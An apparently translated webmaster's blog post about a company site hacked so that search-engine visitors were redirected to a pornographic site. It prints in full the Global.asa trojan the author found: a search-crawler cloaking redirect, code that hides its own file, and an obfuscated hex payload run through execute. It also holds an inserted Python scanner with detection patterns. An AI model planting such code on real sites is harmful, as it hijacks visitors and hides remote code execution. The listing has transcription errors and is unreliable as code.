Recently, clicking our company's website in Baidu search results opened a pornographic site, while typing the URL directly showed no problem. Baidu's results also flagged the site as hacked. Many customers who searched for our site ended up on the pornographic site, which did great damage to the company's image. As the company's website technician, and a webmaster for the past 5 years, I was not frightened, and started by analyzing why the site had been hacked.
Starting from Baidu's index
A Baidu site: query on our own website turned up a lot of snapshots of pornographic content, movies, "beauty" hosts and the like, more than 300 snapshots in all. Then I looked at how the site's home page was indexed and found it unrecognizable: the Baidu snapshot was empty, the title of the website was just the address of the website, and the content was empty too. I realized that the site must have been "K'd" (penalized) by Baidu.
Opening any one of these addresses redirects straight to the pornographic site, whose address is: http://mrr.8800.org/mm/
The following figure:
The problem slowly surfaces
First, on the surface, the number of indexed pages for the site had proliferated, and they contained a lot of malicious and illegal content (pornography and so on). The other surface symptom is that clicking through from a search engine automatically redirects to the pornographic site, while entering the site's address directly does not redirect. At this point I was sure the problem lay in the site's program. Logging in to the hosting space over FTP, I found many unfamiliar folders in the root directory; the files inside them could not be deleted, and I kept getting a message that I did not have permission to delete them. One directory level further down I saw a file with a strange name, Global.asa. The Sinesafe Trojan detection tool identified it as a Trojan file. Its contents are as follows:
< script runat= "Server" >
' Web site global file
Sub Application_OnStart
End Sub
Sub Application_OnEnd
End Sub
Public Function gethtml (URL)
Set objxmlhttp=server.createobject ("Msxml2.serverxmlhttp")
Objxmlhttp.open "Get", Url,false
Objxmlhttp.setrequestheader "user", url
Objxmlhttp.send
Gethtml=objxmlhttp.responsebody
Set objxmlhttp=nothing
Set objstream = Server.CreateObject ("ADODB.stream")
objStream.Type = 1
Objstream.mode =3
objStream.Open
Objstream.write gethtml
objstream.position = 0
objStream.Type = 2
Objstream.charset = "gb2312"
gethtml = Objstream.readtext
objStream.Close
End Function
Function Check (user_agent)
Allow_agent=split ("Baiduspider,sogou,baidu,sosospider,googlebot,fast-webcrawler,msnbot,slurp,qihoobot, Youdaobot,iaskspider ",", ")
Check_agent=false
For Agenti=lbound (allow_agent) To UBound (allow_agent)
If InStr (User_agent,allow_agent (agenti)) >0 Then
Check_agent=true
Exit For
End If
Next
Check=check_agent
End Function
Function Checkrefresh ()
Checkrefresh = False
Dim Botlist,i,repls
Krobotlist = "Baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask"
Botlist = Split (krobotlist, "|")
For i = 0 to Ubound (botlist)
If InStr (Left (Request.ServerVariables ("Http_referer"), ""), Botlist (i)) > 0 Then
Checkrefresh = True
Exit for
End If
Next
End Function
Sub Session_OnStart
On Error Resume Next
. ServerVariables ("path_translated")
Set s=server.createobject ("Scripting.FileSystemObject")
Set F=s.getfile ("//./" & Server.MapPath ("/global.asa"))
V=request.form&request.querystring
If InStr (V, ". Asa") >0 Then
f.attributes=39
Response.End ()
End If
If InStr (Name, ";") >0 OR InStr (server. MapPath ("."), ". as") >0 Then
S.getfile (name). Attributes=0
S.deletefile (name)
f.attributes=39
Response.End ()
End If
S= "636e6e62643d6c6361736528726571756573742e736572766572:o=": For I=1 to Len (s) step 2:c=mid (s,i,2): If isnumeric (Mid s,i,1)) Then:execute ("O=O&CHR (&h &c&)"): Else:execute ("O=o&chr &h" &c&mid (s,i+ 2,2) & "): I=i+2:end If:Next:execute O
End Sub
Looking at this code left me a little dizzy.
"Baiduspider,sogou,baidu,sosospider,googlebot,fastwebcrawler,msnbot,slurp,qihoo": this line of code is the search-engine conditional redirect. That is to say, the Trojan keys on search engines: any visit that comes from Baidu, Sogou or Google is redirected straight to the site he set.
There is also some binary code that has been encrypted. I do not know how to decrypt it, but my analysis is that it is the redirect URL he set. I asked a few friends to look at the code, and my good friend Lao Liu said there is a conditional redirect based on cookies and IP: the same IP and cookies get the pop-up window only once, not a second time. The hacker's technique is very clever, and it shows what sinister tricks people will use for profit. This code is well hidden and almost impossible for webmasters to detect.
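As an added example (not from the original article and not the Sinesafe tool), the Python scanner below flags the traits visible in the Global.asa listing: crawler-name lists, Referer checks, server-side fetches, the file attribute value 39 and long hex strings, which it decodes for review without executing them. The indicator set, the thresholds and all function names are assumptions chosen for this sample.

```python
import re

# Crawler tokens from the Check() / Checkrefresh() lists in the listing above.
CRAWLERS = ["baiduspider", "sogou", "sosospider", "googlebot", "msnbot",
            "slurp", "qihoo", "youdao", "iask", "bing", "yahoo"]
# Whitespace-tolerant patterns (assumed indicator set, chosen for this sample).
PATTERNS = {
    "server_side_fetch": re.compile(r"msxml2\s*\.\s*serverxmlhttp", re.I),
    "referer_check": re.compile(r"http_referer", re.I),
    "dynamic_execute": re.compile(r"\bexecute\b", re.I),
    # 39 = ReadOnly(1) + Hidden(2) + System(4) + Archive(32)
    "hide_file_attrs": re.compile(r"\.\s*attributes\s*=\s*39\b", re.I),
}
HEX_RUN = re.compile(r"[0-9a-fA-F]{40,}")
# Constructed sample: fragments of the Global.asa listing, not a full file.
SAMPLE = '''
Set objxmlhttp=server.createobject ("Msxml2.serverxmlhttp")
Allow_agent=split ("Baiduspider,sogou,baidu,sosospider,googlebot", ",")
If InStr (Request.ServerVariables ("Http_referer"), Botlist (i)) > 0 Then
f.attributes=39
S= "636e6e62643d6c6361736528726571756573742e736572766572"
'''

def decode_hex_preview(run):
    """Decode a hex run to printable ASCII for review; never executes it."""
    raw = bytes.fromhex(run[: len(run) // 2 * 2])
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)

def scan_asp_source(text):
    """Return {indicator: detail} for the text of one ASP/ASA file."""
    low = text.lower()
    hits = {}
    seen = [c for c in CRAWLERS if c in low]
    if len(seen) >= 3:  # a single crawler name is common in benign code
        hits["crawler_list"] = seen
    for name, pat in PATTERNS.items():
        if pat.search(text):
            hits[name] = True
    runs = HEX_RUN.findall(text)
    if runs:
        hits["hex_payload"] = [decode_hex_preview(r) for r in runs]
    return hits

def verdict(hits):
    """Flag a file when cloaking and hiding indicators coincide."""
    cloaking = "crawler_list" in hits and ("referer_check" in hits or "server_side_fetch" in hits)
    hiding = "hex_payload" in hits or "hide_file_attrs" in hits
    return "suspicious" if cloaking and hiding else "review" if hits else "clean"

if __name__ == "__main__":
    print(verdict(scan_asp_source(SAMPLE)))
```

Run it over every .asa, .asp and .aspx file in a downloaded copy of the site; a "review" verdict means a single indicator matched and the file needs a manual look.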
Once the root cause is found, solve the problem
I downloaded the website's source code from the hosting space and ran it through the Sinesafe Trojan detection tool, which found a lot of Trojan files, among them global.asa, z.aspx, cende.asp and phzltoxn.php. I will not publish the Trojan code here. Without further ado, I clicked to clear the Trojans and deleted them all. For the files that could not be deleted over FTP, I asked the hosting provider to delete them and empty the directories directly on the server. The last step was to change the site's back-end password. Last year's CSDN password leak really worried people, and I suffered a loss from it myself: my CSDN password and my mailbox password were the same, so my mailbox was stolen and my Alipay was cashed out. I will remember that loss for a lifetime: once bitten, ten years shy!
After changing the password and the address of the database, I uploaded the cleaned site files back to the hosting space, and site access was normal. The traces the hackers had left in Baidu I submitted to the Baidu Complaint Center, explaining why the site had been hacked; once Baidu's update cycle comes around, the problem can be solved.
It has been a difficult road all the way, and experience is the most valuable thing. I hope the solution above can help more people who need it. Every webmaster's experience is different; if we can share selflessly, we webmasters will go further! Source of this article: server security www.sinesafe.cn, first published on A5. Reprints are welcome; please credit the author and the source. Thank you!